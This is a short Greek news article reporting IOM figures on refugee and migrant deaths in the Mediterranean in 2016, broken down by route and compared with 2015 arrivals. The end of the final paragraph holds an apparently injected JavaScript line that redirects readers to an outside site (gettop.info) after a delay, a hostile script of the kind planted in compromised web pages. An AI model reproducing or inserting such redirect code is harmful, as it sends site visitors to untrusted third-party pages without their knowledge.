Περίπου 4.000 πρόσφυγες έχασαν τη ζωή τους στη Μεσόγειο το 2016

0
5

 

Συνολικά 3.940 πρόσφυγες και μετανάστες έχασαν τη ζωή τους κατά τον διάπλου της Μεσογείου εφέτος, σύμφωνα με τα στοιχεία που ανακοίνωσε ο Διεθνής Οργανισμός Μετανάστευσης (ΔΟΜ).

Οι περισσότεροι θάνατοι (3.463) καταγράφηκαν στην κεντρική Μεσόγειο ενώ άλλοι 415 χάθηκαν στο πέρασμα της ανατολικής Μεσογείου, μεταξύ Τουρκίας και Ελλάδας. Επίσης, 62 πνίγηκαν διασχίζοντας τη δυτική Μεσόγειο και τα περάσματα της δυτικής Αφρικής.

Αν και ο αριθμός των μεταναστών που έχασαν τη ζωή τους στη θάλασσα από τις αρχές του έτους έχει ήδη ξεπεράσει τον αριθμό των θυμάτων για το σύνολο του 2015, οπότε κατεγράφησαν 3.702 θάνατοι, ο αριθμός των αφίξεων είναι σημαντικά χαμηλότερος.

Σύμφωνα με τα στοιχεία του ΔΟΜ, σχεδόν 333.400 μετανάστες και πρόσφυγες έφθασαν στις ευρωπαϊκές ακτές δια θαλάσσης φέτος, συγκριτικά με 728.926 αφίξεις που καταγράφηκαν την αντίστοιχη περίοδο του 2015.

Πάνω από ένα εκατομμύριο μετανάστες και πρόσφυγες ήλθαν τελικά στην Ευρώπη έως τα τέλη του περασμένου έτους, με τους περισσότερους εξ αυτών να φθάνουν στην Ελλάδα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here